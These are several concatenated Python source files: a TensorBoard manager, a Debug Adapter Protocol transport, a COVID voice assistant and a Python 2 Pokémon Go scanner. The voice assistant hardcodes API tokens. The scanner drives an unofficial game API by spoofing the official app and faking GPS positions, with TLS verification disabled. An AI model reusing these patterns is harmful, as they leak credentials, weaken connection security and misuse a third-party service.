plugins=default.get_plugins())
except ImportError:
# Tensorboard 0.3.x series
from tensorboard.plugins.audio import audio_plugin
from tensorboard.plugins.core import core_plugin
from tensorboard.plugins.distribution import distributions_plugin
from tensorboard.plugins.graph import graphs_plugin
from tensorboard.plugins.histogram import histograms_plugin
from tensorboard.plugins.image import images_plugin
from tensorboard.plugins.profile import profile_plugin
from tensorboard.plugins.projector import projector_plugin
from tensorboard.plugins.scalar import scalars_plugin
from tensorboard.plugins.text import text_plugin
logging.debug("Tensorboard 0.3.x series detected")
_plugins = [
core_plugin.CorePlugin,
scalars_plugin.ScalarsPlugin,
images_plugin.ImagesPlugin,
audio_plugin.AudioPlugin,
graphs_plugin.GraphsPlugin,
distributions_plugin.DistributionsPlugin,
histograms_plugin.HistogramsPlugin,
projector_plugin.ProjectorPlugin,
text_plugin.TextPlugin,
profile_plugin.ProfilePlugin,
]
def create_tb_app(logdir, reload_interval, purge_orphaned_data):
return application.standard_tensorboard_wsgi(
logdir=logdir, reload_interval=reload_interval,
purge_orphaned_data=purge_orphaned_data,
plugins=_plugins)
from .handlers import notebook_dir # noqa
TensorBoardInstance = namedtuple(
'TensorBoardInstance', ['name', 'logdir', 'tb_app', 'thread'])
def start_reloading_multiplexer(multiplexer, path_to_run, reload_interval):
def _ReloadForever():
current_thread = threading.currentThread()
while not current_thread.stop:
application.reload_multiplexer(multiplexer, path_to_run)
current_thread.reload_time = time.time()
time.sleep(reload_interval)
thread = threading.Thread(target=_ReloadForever)
thread.reload_time = None
thread.stop = False
thread.daemon = True
thread.start()
return thread
def TensorBoardWSGIApp(logdir, plugins, multiplexer,
reload_interval, path_prefix=""):
path_to_run = application.parse_event_files_spec(logdir)
if reload_interval:
thread = start_reloading_multiplexer(
multiplexer, path_to_run, reload_interval)
else:
application.reload_multiplexer(multiplexer, path_to_run)
thread = None
tb_app = application.TensorBoardWSGI(plugins)
manager.add_instance(logdir, tb_app, thread)
return tb_app
application.TensorBoardWSGIApp = TensorBoardWSGIApp
class TensorboardManger(dict):
def __init__(self):
self._logdir_dict = {}
def _next_available_name(self):
for n in itertools.count(start=1):
name = "%d" % n
if name not in self:
return name
def new_instance(self, logdir, reload_interval):
if not os.path.isabs(logdir) and notebook_dir:
logdir = os.path.join(notebook_dir, logdir)
if logdir not in self._logdir_dict:
purge_orphaned_data = True
reload_interval = reload_interval or 30
create_tb_app(
logdir=logdir, reload_interval=reload_interval,
purge_orphaned_data=purge_orphaned_data)
return self._logdir_dict[logdir]
def add_instance(self, logdir, tb_application, thread):
name = self._next_available_name()
instance = TensorBoardInstance(name, logdir, tb_application, thread)
self[name] = instance
self._logdir_dict[logdir] = instance
def terminate(self, name, force=True):
if name in self:
instance = self[name]
if instance.thread is not None:
instance.thread.stop = True
del self[name], self._logdir_dict[instance.logdir]
else:
raise Exception("There's no tensorboard instance named %s" % name)
manager = TensorboardManger()
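# Hedged usage sketch: create (or reuse) an instance for a log directory and later stop it.
# The logdir value is illustrative; relative paths are resolved against notebook_dir.
#
#   instance = manager.new_instance("logs/run1", reload_interval=30)
#   manager.terminate(instance.name)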
|
transport.py
|
'''
implements the client side of the Debug Adapter protocol
documentation can be found here
https://microsoft.github.io/debug-adapter-protocol/specification
https://microsoft.github.io/debug-adapter-protocol/overview
a list of server implementers can be found here
https://microsoft.github.io/debug-adapter-protocol/implementors/adapters/
'''
from __future__ import annotations
from ..typecheck import *
from ..import core
from .error import Error
import threading
class Transport(Protocol):
def write(self, message: bytes):
...
def readline(self) -> bytes:
...
def read(self, n: int) -> bytes:
...
def dispose(self):
...
class TransportProtocolListener (Protocol):
def on_event(self, event: str, body: dict[str, Any]):
...
async def on_reverse_request(self, command: str, arguments: dict[str, Any]) -> dict[str, Any]:
...
def on_transport_closed(self): ...
class TransportProtocol:
def __init__(
self,
transport: Transport,
events: TransportProtocolListener,
transport_log: core.Logger,
) -> None:
self.events = events
self.transport_log = transport_log
self.transport = transport
self.pending_requests: dict[int, core.Future[dict[str, Any]]] = {}
self.seq = 0
self.transport_log.log('transport', f'⟸ process/started ::')
self.thread = threading.Thread(target=self.read)
self.thread.start()
# Content-Length: 119\r\n
# \r\n
# {
# "seq": 153,
# "type": "request",
# "command": "next",
# "arguments": {
# "threadId": 3
# }
# }
def read(self):
header = b'Content-Length: '
header_length = len(header)
try:
while True:
# handle Content-Length: 119\r\n
line = self.transport.readline()
if not line.startswith(header):
core.error('Expected a Content-Length: header but did not find one...')
continue
size = int(line[header_length:].strip())
#handle \r\n
line = self.transport.readline()
if line != b'\r\n':
core.error('Expected \\r\\n but did not find...')
core.error(line)
continue
# read message
content = b''
while len(content) != size:
bytes_left = size - len(content)
content += self.transport.read(bytes_left)
core.call_soon_threadsafe(self.recieved_msg, core.json_decode(content))
except Exception as e:
core.call_soon_threadsafe(self.transport_log.log,'transport', f'⟸ process/stopped :: {e}')
core.call_soon_threadsafe(self.events.on_transport_closed)
def send(self, message: dict[str, Any]):
content = core.json_encode(message)
self.transport.write(bytes(f'Content-Length: {len(content)}\r\n\r\n{content}', 'utf-8'))
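# Sketch of the bytes send() writes for the request documented above the read() method:
# the JSON body is prefixed with a Content-Length header and a blank line, e.g.
#
#   Content-Length: <len(content)>\r\n
#   \r\n
#   {"seq": 153, "type": "request", "command": "next", "arguments": {"threadId": 3}}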
def dispose(self) -> None:
self.transport.dispose()
def transport_message(self, message: dict[str, Any]) -> None:
self.recieved_msg(message)
def send_request_asyc(self, command: str, args: dict[str, Any]|None) -> Awaitable[dict[str, Any]]:
future: core.Future[Dict[str, Any]] = core.Future()
self.seq += 1
request = {
'seq': self.seq,
'type': 'request',
'command': command,
'arguments': args
}
self.pending_requests[self.seq] = future
self.log_transport(True, request)
self.send(request)
return future
def send_response(self, request: dict[str, Any], body: dict[str, Any], error: str|None = None) -> None:
self.seq += 1
if error:
success = False
else:
success = True
data = {
'type': 'response',
'seq': self.seq,
'request_seq': request['seq'],
'command': request['command'],
'body': body,
'success': success,
'message': error,
}
self.log_transport(True, data)
self.send(data)
def log_transport(self, out: bool, data: dict[str, Any]):
type = data.get('type')
def sigil(success: bool):
if success:
if out:
return '⟸'
else:
return '⟹'
else:
if out:
return '⟽'
else:
return '⟾'
if type == 'response':
id = data.get('request_seq')
command = data.get('command')
body = data.get('body', data.get('message'))
self.transport_log.log('transport', f'{sigil(data.get("success", False))} response/{command}({id}) :: {body}')
return
if type == 'request':
id = data.get('seq')
command = data.get('command')
body = data.get('arguments')
self.transport_log.log('transport', f'{sigil(True)} request/{command}({id}) :: {body}')
return
if type == 'event':
command = data.get('event')
body = data.get('body')
self.transport_log.log('transport', f'{sigil(True)} event/{command} :: {body}')
return
self.transport_log.log('transport', f'{sigil(False)} {type}/unknown :: {data}')
@core.schedule
async def handle_reverse_request(self, request: dict[str, Any]):
command = request['command']
try:
response = await self.events.on_reverse_request(command, request.get('arguments', {}))
self.send_response(request, response)
except core.Error as e:
self.send_response(request, {}, error=str(e))
def recieved_msg(self, data: dict[str, Any]) -> None:
t = data['type']
self.log_transport(False, data)
if t == 'response':
try:
future = self.pending_requests.pop(data['request_seq'])
except KeyError:
# the python adapter seems to send multiple initialized responses?
core.info("ignoring request request_seq not found")
return
success = data['success']
if not success:
body: dict[str, Any] = data.get('body', {})
if error := body.get('error'):
future.set_exception(Error.from_message(error))
return
future.set_exception(Error(data.get('message', 'no error message')))
return
else:
body: dict[str, Any] = data.get('body', {})
future.set_result(body)
return
if t == 'request':
core.call_soon(self.handle_reverse_request, data)
if t == 'event':
event_body: dict[str, Any] = data.get('body', {})
event = data['event']
# use call_soon so that events and responses are handled in the same order as the server sent them
core.call_soon(self.events.on_event, event, event_body)
|
covid_voice_assistant.py
|
import requests
import json
import pyttsx3
import speech_recognition as sr
import re
import threading
import time
API_KEY = "tjouGqHAS-5X"
PROJECT_TOKEN = "t-Ub-trMaofD"
RUN_TOKEN = "t5zp4TEoB6zY"
class Data:
def __init__(self, api_key, project_token):
self.api_key = api_key
self.project_token = project_token
self.params = {
"api_key": self.api_key
}
self.data = self.get_data()
def get_data(self):
response = requests.get(f'https://www.parsehub.com/api/v2/projects/{self.project_token}/last_ready_run/data', params=self.params)
data = json.loads(response.text)
return data
def get_total_cases(self):
data = self.data['total']
for content in data:
if content['name'] == "Coronavirus Cases:":
return content['value']
def get_total_deaths(self):
data = self.data['total']
for content in data:
if content['name'] == "Deaths:":
return content['value']
return "0"
def get_country_data(self, country):
data = self.data["country"]
for content in data:
if content['name'].lower() == country.lower():
return content
return "0"
def get_list_of_countries(self):
countries = []
for country in self.data['country']:
countries.append(country['name'].lower())
return countries
def update_data(self):
response = requests.post(f'https://www.parsehub.com/api/v2/projects/{self.project_token}/run', params=self.params)
def poll():
time.sleep(0.1)
old_data = self.data
while True:
new_data = self.get_data()
if new_data != old_data:
self.data = new_data
print("Data updated")
break
time.sleep(5)
t = threading.Thread(target=poll)
t.start()
def speak(text):
engine = pyttsx3.init()
engine.say(text)
engine.runAndWait()
def get_audio():
r = sr.Recognizer()
with sr.Microphone() as source:
audio = r.listen(source)
said = ""
try:
said = r.recognize_google(audio)
except Exception as e:
print("Exception ", str(e))
return said.lower()
def main():
speak("welcome bavadharini")
speak("session Started")
print("------------Session Started-------------")
data = Data(API_KEY, PROJECT_TOKEN)
END_PHRASE = "terminate"
country_list = data.get_list_of_countries()
TOTAL_PATTERNS = {
re.compile("[\w\s]+ total [\w\s]+ cases"):data.get_total_cases,
re.compile("[\w\s]+ total cases"): data.get_total_cases,
re.compile("[\w\s]+ total [\w\s]+ deaths"): data.get_total_deaths,
re.compile("[\w\s]+ total deaths"): data.get_total_deaths
}
COUNTRY_PATTERNS = {
re.compile("[\w\s]+ cases [\w\s]+"): lambda country: data.get_country_data(country)['total_cases'],
re.compile("[\w\s]+ deaths [\w\s]+"): lambda country: data.get_country_data(country)['total_deaths'],
}
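# Examples of prompts the patterns above are meant to match (phrasing is illustrative,
# and the country example only resolves if "india" appears in the scraped country list):
#   "how many total cases"       -> data.get_total_cases
#   "how many total deaths"      -> data.get_total_deaths
#   "how many cases in india"    -> data.get_country_data("india")['total_cases']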
UPDATE_COMMAND = "update"
while True:
print("Listening...")
speak("listening")
text = get_audio()
print("prompt:",text)
result = None
for pattern, func in COUNTRY_PATTERNS.items():
if pattern.match(text):
words = set(text.split(" "))
for country in country_list:
if country in words:
result = func(country)
break
for pattern, func in TOTAL_PATTERNS.items():
if pattern.match(text):
result = func()
break
if text == UPDATE_COMMAND:
result = "Data is being updated. This may take a moment!"
data.update_data()
if result:
print(result)
speak(result)
if text.find(END_PHRASE) != -1:
print("Exit")
break
main()
|
example.py
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
#test223
import flask
from flask import Flask, render_template
from flask_googlemaps import GoogleMaps
from flask_googlemaps import Map
from flask_googlemaps import icons
import os
import re
import sys
import struct
import json
import requests
import argparse
import getpass
import threading
import werkzeug.serving
import pokemon_pb2
import time
import functools  # needed by the @memoize decorator further down
from google.protobuf.internal import encoder
from google.protobuf.message import DecodeError
from s2sphere import *
from datetime import datetime
from geopy.geocoders import GoogleV3
from gpsoauth import perform_master_login, perform_oauth
from geopy.exc import GeocoderTimedOut, GeocoderServiceError
from requests.packages.urllib3.exceptions import InsecureRequestWarning
from requests.adapters import ConnectionError
from requests.models import InvalidURL
from transform import *
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
API_URL = 'https://pgorelease.nianticlabs.com/plfe/rpc'
LOGIN_URL = \
'https://sso.pokemon.com/sso/login?service=https://sso.pokemon.com/sso/oauth2.0/callbackAuthorize'
LOGIN_OAUTH = 'https://sso.pokemon.com/sso/oauth2.0/accessToken'
APP = 'com.nianticlabs.pokemongo'
with open('credentials.json') as file:
credentials = json.load(file)
PTC_CLIENT_SECRET = credentials.get('ptc_client_secret', None)
ANDROID_ID = credentials.get('android_id', None)
SERVICE = credentials.get('service', None)
CLIENT_SIG = credentials.get('client_sig', None)
GOOGLEMAPS_KEY = credentials.get('gmaps_key', None)
SESSION = requests.session()
SESSION.headers.update({'User-Agent': 'Niantic App'})
SESSION.verify = False
global_password = None
global_token = None
access_token = None
DEBUG = True
VERBOSE_DEBUG = False # if you want to write raw request/response to the console
COORDS_LATITUDE = 0
COORDS_LONGITUDE = 0
COORDS_ALTITUDE = 0
FLOAT_LAT = 0
FLOAT_LONG = 0
NEXT_LAT = 0
NEXT_LONG = 0
auto_refresh = 0
default_step = 0.001
api_endpoint = None
pokemons = {}
gyms = {}
pokestops = {}
numbertoteam = { # At least I'm pretty sure that's it. I could be wrong and then I'd be displaying the wrong owner team of gyms.
0: 'Gym',
1: 'Mystic',
2: 'Valor',
3: 'Instinct',
}
origin_lat, origin_lon = None, None
is_ampm_clock = False
# stuff for in-background search thread
search_thread = None
def memoize(obj):
cache = obj.cache = {}
@functools.wraps(obj)
def memoizer(*args, **kwargs):
key = str(args) + str(kwargs)
if key not in cache:
cache[key] = obj(*args, **kwargs)
return cache[key]
return memoizer
def parse_unicode(bytestring):
decoded_string = bytestring.decode(sys.getfilesystemencoding())
return decoded_string
def debug(message):
if DEBUG:
print '[-] {}'.format(message)
def time_left(ms):
s = ms / 1000
(m, s) = divmod(s, 60)
(h, m) = divmod(m, 60)
return (h, m, s)
def encode(cellid):
output = []
encoder._VarintEncoder()(output.append, cellid)
return ''.join(output)
def getNeighbors():
origin = CellId.from_lat_lng(LatLng.from_degrees(FLOAT_LAT,
FLOAT_LONG)).parent(15)
walk = [origin.id()]
# 10 before and 10 after
next = origin.next()
prev = origin.prev()
for i in range(10):
walk.append(prev.id())
walk.append(next.id())
next = next.next()
prev = prev.prev()
return walk
def f2i(float):
return struct.unpack('<Q', struct.pack('<d', float))[0]
def f2h(float):
return hex(struct.unpack('<Q', struct.pack('<d', float))[0])
def h2f(hex):
return struct.unpack('<d', struct.pack('<Q', int(hex, 16)))[0]
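# These helpers reinterpret a double's bit pattern as a 64-bit integer (and back),
# which is how this script encodes coordinates for the API. For example:
#   f2i(1.0) == 0x3ff0000000000000
#   h2f('0x3ff0000000000000') == 1.0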
def retrying_set_location(location_name):
"""
Continue trying to get co-ords from Google Location until we have them
:param location_name: string to pass to Location API
:return: None
"""
while True:
try:
set_location(location_name)
return
except (GeocoderTimedOut, GeocoderServiceError), e:
debug(
'retrying_set_location: geocoder exception ({}), retrying'.format(
str(e)))
time.sleep(1.25)
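# Both a place name and a raw "lat,lng" pair are accepted (the regex in set_location
# below decides which). Illustrative calls:
#   retrying_set_location('Times Square, New York')
#   retrying_set_location('40.758896, -73.985130')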
def set_location(location_name):
geolocator = GoogleV3()
prog = re.compile('^(\-?\d+(\.\d+)?),\s*(\-?\d+(\.\d+)?)$')
global origin_lat
global origin_lon
if prog.match(location_name):
local_lat, local_lng = [float(x) for x in location_name.split(",")]
alt = 0
origin_lat, origin_lon = local_lat, local_lng
else:
loc = geolocator.geocode(location_name)
origin_lat, origin_lon = local_lat, local_lng = loc.latitude, loc.longitude
alt = loc.altitude
print '[!] Your given location: {}'.format(loc.address.encode('utf-8'))
print('[!] lat/long/alt: {} {} {}'.format(local_lat, local_lng, alt))
set_location_coords(local_lat, local_lng, alt)
def set_location_coords(lat, long, alt):
global COORDS_LATITUDE, COORDS_LONGITUDE, COORDS_ALTITUDE
global FLOAT_LAT, FLOAT_LONG
FLOAT_LAT = lat
FLOAT_LONG = long
COORDS_LATITUDE = f2i(lat) # 0x4042bd7c00000000 # f2i(lat)
COORDS_LONGITUDE = f2i(long) # 0xc05e8aae40000000 #f2i(long)
COORDS_ALTITUDE = f2i(alt)
def get_location_coords():
return (COORDS_LATITUDE, COORDS_LONGITUDE, COORDS_ALTITUDE)
def retrying_api_req(service, api_endpoint, access_token, *args, **kwargs):
while True:
try:
response = api_req(service, api_endpoint, access_token, *args,
**kwargs)
if response:
return response
debug('retrying_api_req: api_req returned None, retrying')
except (InvalidURL, ConnectionError, DecodeError), e:
debug('retrying_api_req: request error ({}), retrying'.format(
str(e)))
time.sleep(1)
def api_req(service, api_endpoint, access_token, *args, **kwargs):
p_req = pokemon_pb2.RequestEnvelop()
p_req.rpc_id = 1469378659230941192
p_req.unknown1 = 2
(p_req.latitude, p_req.longitude, p_req.altitude) = \
get_location_coords()
p_req.unknown12 = 989
if 'useauth' not in kwargs or not kwargs['useauth']:
p_req.auth.provider = service
p_req.auth.token.contents = access_token
p_req.auth.token.unknown13 = 14
else:
p_req.unknown11.unknown71 = kwargs['useauth'].unknown71
p_req.unknown11.unknown72 = kwargs['useauth'].unknown72
p_req.unknown11.unknown73 = kwargs['useauth'].unknown73
for arg in args:
p_req.MergeFrom(arg)
protobuf = p_req.SerializeToString()
r = SESSION.post(api_endpoint, data=protobuf, verify=False)
p_ret = pokemon_pb2.ResponseEnvelop()
p_ret.ParseFromString(r.content)
if VERBOSE_DEBUG:
print 'REQUEST:'
print p_req
print 'Response:'
print p_ret
print '''
'''
time.sleep(0.51)
return p_ret
def get_api_endpoint(service, access_token, api=API_URL):
profile_response = None
while not profile_response:
profile_response = retrying_get_profile(service, access_token, api,
None)
if not hasattr(profile_response, 'api_url'):
debug(
'retrying_get_profile: get_profile returned no api_url, retrying')
profile_response = None
continue
if not len(profile_response.api_url):
debug(
'get_api_endpoint: retrying_get_profile returned no-len api_url, retrying')
profile_response = None
return 'https://%s/rpc' % profile_response.api_url
def retrying_get_profile(service, access_token, api, useauth, *reqq):
profile_response = None
while not profile_response:
profile_response = get_profile(service, access_token, api, useauth,
*reqq)
if not hasattr(profile_response, 'payload'):
debug(
'retrying_get_profile: get_profile returned no payload, retrying')
profile_response = None
continue
if not profile_response.payload:
debug(
'retrying_get_profile: get_profile returned no-len payload, retrying')
profile_response = None
return profile_response
def get_profile(service, access_token, api, useauth, *reqq):
req = pokemon_pb2.RequestEnvelop()
req1 = req.requests.add()
req1.type = 2
if len(reqq) >= 1:
req1.MergeFrom(reqq[0])
req2 = req.requests.add()
req2.type = 126
if len(reqq) >= 2:
req2.MergeFrom(reqq[1])
req3 = req.requests.add()
req3.type = 4
if len(reqq) >= 3:
req3.MergeFrom(reqq[2])
req4 = req.requests.add()
req4.type = 129
if len(reqq) >= 4:
req4.MergeFrom(reqq[3])
req5 = req.requests.add()
req5.type = 5
if len(reqq) >= 5:
req5.MergeFrom(reqq[4])
return retrying_api_req(service, api, access_token, req, useauth=useauth)
def login_google(username, password):
print '[!] Google login for: {}'.format(username)
r1 = perform_master_login(username, password, ANDROID_ID)
r2 = perform_oauth(username,
r1.get('Token', ''),
ANDROID_ID,
SERVICE,
APP,
CLIENT_SIG, )
return r2.get('Auth')
def login_ptc(username, password):
print '[!] PTC login for: {}'.format(username)
head = {'User-Agent': 'Niantic App'}
r = SESSION.get(LOGIN_URL, headers=head)
if r is None:
return render_template('nope.html', fullmap=fullmap)
try:
jdata = json.loads(r.content)
except ValueError, e:
debug('login_ptc: could not decode JSON from {}'.format(r.content))
return None
# Maximum password length is 15 (sign in page enforces this limit, API does not)
if len(password) > 15:
print '[!] Trimming password to 15 characters'
password = password[:15]
data = {
'lt': jdata['lt'],
'execution': jdata['execution'],
'_eventId': 'submit',
'username': username,
'password': password,
}
r1 = SESSION.post(LOGIN_URL, data=data, headers=head)
ticket = None
try:
ticket = re.sub('.*ticket=', '', r1.history[0].headers['Location'])
except Exception, e:
if DEBUG:
print r1.json()['errors'][0]
return None
data1 = {
'client_id': 'mobile-app_pokemon-go',
'redirect_uri': 'https://www.nianticlabs.com/pokemongo/error',
'client_secret': PTC_CLIENT_SECRET,
'grant_type': 'refresh_token',
'code': ticket,
}
r2 = SESSION.post(LOGIN_OAUTH, data=data1)
access_token = re.sub('&expires.*', '', r2.content)
access_token = re.sub('.*access_token=', '', access_token)
return access_token
def get_heartbeat(service,
api_endpoint,
access_token,
response, ):
m4 = pokemon_pb2.RequestEnvelop.Requests()
m = pokemon_pb2.RequestEnvelop.MessageSingleInt()
m.f1 = int(time.time() * 1000)
m4.message = m.SerializeToString()
m5 = pokemon_pb2.RequestEnvelop.Requests()
m = pokemon_pb2.RequestEnvelop.MessageSingleString()
m.bytes = '05daf51635c82611d1aac95c0b051d3ec088a930'
m5.message = m.SerializeToString()
walk = sorted(getNeighbors())
m1 = pokemon_pb2.RequestEnvelop.Requests()
m1.type = 106
m = pokemon_pb2.RequestEnvelop.MessageQuad()
m.f1 = ''.join(map(encode, walk))
m.f2 = \
"\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000"
m.lat = COORDS_LATITUDE
m.long = COORDS_LONGITUDE
m1.message = m.SerializeToString()
response = get_profile(service,
access_token,
api_endpoint,
response.unknown7,
m1,
pokemon_pb2.RequestEnvelop.Requests(),
m4,
pokemon_pb2.RequestEnvelop.Requests(),
m5, )
try:
payload = response.payload[0]
except (AttributeError, IndexError):
return
heartbeat = pokemon_pb2.ResponseEnvelop.HeartbeatPayload()
heartbeat.ParseFromString(payload)
return heartbeat
def get_token(service, username, password):
"""
Get token if it's not None
:return:
:rtype:
"""
global global_token
if global_token is None:
if service == 'ptc':
global_token = login_ptc(username, password)
else:
global_token = login_google(username, password)
return global_token
else:
return global_token
def get_args():
parser = argparse.ArgumentParser()
parser.add_argument(
'-a', '--auth_service', type=str.lower, help='Auth Service', default='ptc')
parser.add_argument('-u', '--username', help='Username', required=True)
parser.add_argument('-p', '--password', help='Password', required=False)
parser.add_argument(
'-l', '--location', type=parse_unicode, help='Location', required=True)
parser.add_argument('-st', '--step-limit', help='Steps', required=True)
group = parser.add_mutually_exclusive_group(required=False)
group.add_argument(
'-i', '--ignore', help='Comma-separated list of Pokémon names or IDs to ignore')
group.add_argument(
'-o', '--only', help='Comma-separated list of Pokémon names or IDs to search')
parser.add_argument(
"-ar",
"--auto_refresh",
help="Enables an autorefresh that behaves the same as a page reload. " +
"Needs an integer value for the amount of seconds")
parser.add_argument(
'-dp',
'--display-pokestop',
help='Display pokéstop',
action='store_true',
default=False)
parser.add_argument(
'-dg',
'--display-gym',
help='Display Gym',
action='store_true',
default=False)
parser.add_argument(
'-H',
'--host',
help='Set web server listening host',
default='127.0.0.1')
parser.add_argument(
'-P',
'--port',
type=int,
help='Set web server listening port',
default=5000)
parser.add_argument(
"-L",
"--locale",
help="Locale for Pokemon names: default en, check locale folder for more options",
default="en")
parser.add_argument(
"-ol",
"--onlylure",
help='Display only lured pokéstop',
action='store_true')
parser.add_argument(
'-c',
'--china',
help='Coordinates transformer for China',
action='store_true')
parser.add_argument(
"-pm",
"--ampm_clock",
help="Toggles the AM/PM clock for Pokemon timers",
action='store_true',
default=False)
parser.add_argument(
'-d', '--debug', help='Debug Mode', action='store_true')
parser.set_defaults(DEBUG=True)
return parser.parse_args()
@memoize
def login(args):
global global_password
if not global_password:
if args.password:
global_password = args.password
else:
global_password = getpass.getpass()
access_token = get_token(args.auth_service, args.username, global_password)
if access_token is None:
raise Exception('[-] Wrong username/password')
print '[+] RPC Session Token: {} ...'.format(access_token[:25])
api_endpoint = get_api_endpoint(args.auth_service, access_token)
if api_endpoint is None:
raise Exception('[-] RPC server offline')
print '[+] Received API endpoint: {}'.format(api_endpoint)
profile_response = retrying_get_profile(args.auth_service, access_token,
api_endpoint, None)
if profile_response is None or not profile_response.payload:
raise Exception('Could not get profile')
print '[+] Login successful'
payload = profile_response.payload[0]
profile = pokemon_pb2.ResponseEnvelop.ProfilePayload()
profile.ParseFromString(payload)
print '[+] Username: {}'.format(profile.profile.username)
creation_time = \
datetime.fromtimestamp(int(profile.profile.creation_time)
/ 1000)
print '[+] You started playing Pokemon Go on: {}'.format(
creation_time.strftime('%Y-%m-%d %H:%M:%S'))
for curr in profile.profile.currency:
print '[+] {}: {}'.format(curr.type, curr.amount)
return api_endpoint, access_token, profile_response
def main():
full_path = os.path.realpath(__file__)
(path, filename) = os.path.split(full_path)
args = get_args()
if args.auth_service not in ['ptc', 'google']:
print '[!] Invalid Auth service specified'
return
print('[+] Locale is ' + args.locale)
pokemonsJSON = json.load(
open(path + '/locales/pokemon.' + args.locale + '.json'))
if args.debug:
global DEBUG
DEBUG = True
print '[!] DEBUG mode on'
# only get location for first run
if not (FLOAT_LAT and FLOAT_LONG):
print('[+] Getting initial location')
retrying_set_location(args.location)
if args.auto_refresh:
global auto_refresh
auto_refresh = int(args.auto_refresh) * 1000
if args.ampm_clock:
global is_ampm_clock
is_ampm_clock = True
api_endpoint, access_token, profile_response = login(args)
clear_stale_pokemons()
steplimit = int(args.step_limit)
ignore = []
only = []
if args.ignore:
ignore = [i.lower().strip() for i in args.ignore.split(',')]
elif args.only:
only = [i.lower().strip() for i in args.only.split(',')]
pos = 1
x = 0
y = 0
dx = 0
dy = -1
steplimit2 = steplimit**2
f = open('test.txt', 'a')
#f.writelines("DayOfWeek,Month,DayOfMonth,Time,Year,TimeLeft,Long,Lat,Name;")
timestamp = time.clock()
for step in range(steplimit2):
#starting at 0 index
debug('looping: step {} of {}'.format((step+1), steplimit**2))
#debug('steplimit: {} x: {} y: {} pos: {} dx: {} dy {}'.format(steplimit2, x, y, pos, dx, dy))
# Scan location math
if -steplimit2 / 2 < x <= steplimit2 / 2 and -steplimit2 / 2 < y <= steplimit2 / 2:
set_location_coords(x * 0.0025 + origin_lat, y * 0.0025 + origin_lon, 0)
if x == y or x < 0 and x == -y or x > 0 and x == 1 - y:
(dx, dy) = (-dy, dx)
(x, y) = (x + dx, y + dy)
#hier
process_step(args, api_endpoint, access_token, profile_response,
pokemonsJSON, ignore, only,f,time.time())
print('Completed: ' + str(
((step+1) + pos * .25 - .25) / (steplimit2) * 100) + '%')
global NEXT_LAT, NEXT_LONG
if (NEXT_LAT and NEXT_LONG and
(NEXT_LAT != FLOAT_LAT or NEXT_LONG != FLOAT_LONG)):
print('Update to next location %f, %f' % (NEXT_LAT, NEXT_LONG))
set_location_coords(NEXT_LAT, NEXT_LONG, 0)
NEXT_LAT = 0
NEXT_LONG = 0
else:
set_location_coords(origin_lat, origin_lon, 0)
register_background_thread()
def process_step(args, api_endpoint, access_token, profile_response,
pokemonsJSON, ignore, only, file, timestamp):
print('[+] Searching for Pokemon at location {} {}'.format(FLOAT_LAT, FLOAT_LONG))
origin = LatLng.from_degrees(FLOAT_LAT, FLOAT_LONG)
step_lat = FLOAT_LAT
step_long = FLOAT_LONG
#print pokename
parent = CellId.from_lat_lng(LatLng.from_degrees(FLOAT_LAT,
FLOAT_LONG)).parent(15)
h = get_heartbeat(args.auth_service, api_endpoint, access_token,
profile_response)
hs = [h]
seen = {}
for child in parent.children():
latlng = LatLng.from_point(Cell(child).get_center())
set_location_coords(latlng.lat().degrees, latlng.lng().degrees, 0)
hs.append(
get_heartbeat(args.auth_service, api_endpoint, access_token,
profile_response))
set_location_coords(step_lat, step_long, 0)
visible = []
for hh in hs:
try:
for cell in hh.cells:
for wild in cell.WildPokemon:
hash = wild.SpawnPointId
if hash not in seen or seen[hash] <= wild.TimeTillHiddenMs:
visible.append(wild)
seen[hash] = wild.TimeTillHiddenMs
if cell.Fort:
for Fort in cell.Fort:
if Fort.Enabled == True:
if args.china:
(Fort.Latitude, Fort.Longitude) = \
transform_from_wgs_to_gcj(Location(Fort.Latitude, Fort.Longitude))
if Fort.GymPoints and args.display_gym:
gyms[Fort.FortId] = [Fort.Team, Fort.Latitude,
Fort.Longitude, Fort.GymPoints]
elif Fort.FortType \
and args.display_pokestop:
expire_time = 0
if Fort.LureInfo.LureExpiresTimestampMs:
expire_time = datetime\
.fromtimestamp(Fort.LureInfo.LureExpiresTimestampMs / 1000.0)\
.strftime("%H:%M:%S")
if (expire_time != 0 or not args.onlylure):
pokestops[Fort.FortId] = [Fort.Latitude,
Fort.Longitude, expire_time]
except AttributeError:
break
for poke in visible:
pokeid = str(poke.pokemon.PokemonId)
pokename = pokemonsJSON[pokeid]
if args.ignore:
if pokename.lower() in ignore or pokeid in ignore:
continue
elif args.only:
if pokename.lower() not in only and pokeid not in only:
continue
disappear_timestamp = time.time() + poke.TimeTillHiddenMs \
/ 1000
if args.china:
(poke.Latitude, poke.Longitude) = \
transform_from_wgs_to_gcj(Location(poke.Latitude,
poke.Longitude))
pokemons[poke.SpawnPointId] = {
"lat": poke.Latitude,
"lng": poke.Longitude,
"disappear_time": disappear_timestamp,
"id": poke.pokemon.PokemonId,
"name": pokename
}
print "---"
print time.time()
print disappear_timestamp
#timenow = str(time.ctime(disappear_timestamp-time.time()))
timeleft = disappear_timestamp-timestamp
timeleft = round(timeleft,0)
timenow = time.ctime(timestamp).split(" ")
file.writelines(str(timenow[0]) + "," + str(timenow[1]) + "," + str(timenow[2]) + "," + str(timenow[3]) + "," + str(timenow[4])+ "," + str(timeleft) + "," + str(disappear_timestamp) + "," + str(poke.Latitude) + "," + str(poke.Longitude) + "," + pokename.encode("utf-8") + ";\n")
def clear_stale_pokemons():
current_time = time.time()
for pokemon_key in pokemons.keys():
pokemon = pokemons[pokemon_key]
if current_time > pokemon['disappear_time']:
print "[+] removing stale pokemon %s at %f, %f from list" % (
pokemon['name'].encode('utf-8'), pokemon['lat'], pokemon['lng'])
del pokemons[pokemon_key]
def register_background_thread(initial_registration=False):
"""
Start a background thread to search for Pokemon
while Flask is still able to serve requests for the map
:param initial_registration: True if first registration and thread should start immediately, False if it's being called by the finishing thread to schedule a refresh
:return: None
"""
debug('register_background_thread called')
global search_thread
if initial_registration:
if not werkzeug.serving.is_running_from_reloader():
debug(
'register_background_thread: not running inside Flask so not starting thread')
return
if search_thread:
debug(
'register_background_thread: initial registration requested but thread already running')
return
debug('register_background_thread: initial registration')
search_thread = threading.Thread(target=main)
else:
debug('register_background_thread: queueing')
search_thread = threading.Timer(30, main) # delay, in seconds
search_thread.daemon = True
search_thread.name = 'search_thread'
search_thread.start()
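# Usage in this file (for reference):
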